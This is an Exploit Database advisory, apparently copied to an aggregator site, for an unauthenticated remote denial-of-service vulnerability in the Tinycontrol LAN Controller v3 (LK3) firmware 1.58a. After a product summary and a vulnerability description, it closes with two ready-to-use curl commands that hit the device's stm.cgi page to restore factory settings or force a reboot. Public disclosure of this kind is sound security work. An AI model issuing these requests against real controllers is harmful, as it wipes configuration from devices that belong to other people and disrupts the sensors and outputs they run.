Tinycontrol LAN Controller v3 (LK3) 1.58a – Remote Denial Of Service

• Exploit Database
• 21 阅读

• 作者： LiquidWorm
  日期： 2023-10-09
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51730/

• Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service
  Exploit Author: LiquidWorm
  
  Vendor: Tinycontrol
  Product web page: https://www.tinycontrol.pl
  Affected version: <=1.58a, HW 3.8
  
  Summary: Lan Controller is a very universal
  device that allows you to connect many different
  sensors and remotely view their readings and
  remotely control various types of outputs.
  It is also possible to combine both functions
  into an automatic if -> this with a calendar
  when -> then. The device provides a user interface
  in the form of a web page. The website presents
  readings of various types of sensors: temperature,
  humidity, pressure, voltage, current. It also
  allows you to configure the device, incl. event
  setting and controlling up to 10 outputs. Thanks
  to the support of many protocols, it is possible
  to operate from smartphones, collect and observ
  the results on the server, as well as cooperation
  with other I/O systems based on TCP/IP and Modbus.
  
  Desc: The controller suffers from an unauthenticated
  remote denial of service vulnerability. An attacker
  can issue direct requests to the stm.cgi page to
  reboot and also reset factory settings on the device.
  
  Tested on: lwIP
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2023-5785
  Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5785.php
  
  
  18.08.2023
  
  --
  
  
  $ curl http://192.168.1.1:8082/stm.cgi?eeprom_reset=1 # restore default settings
  $ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1 # reboot controller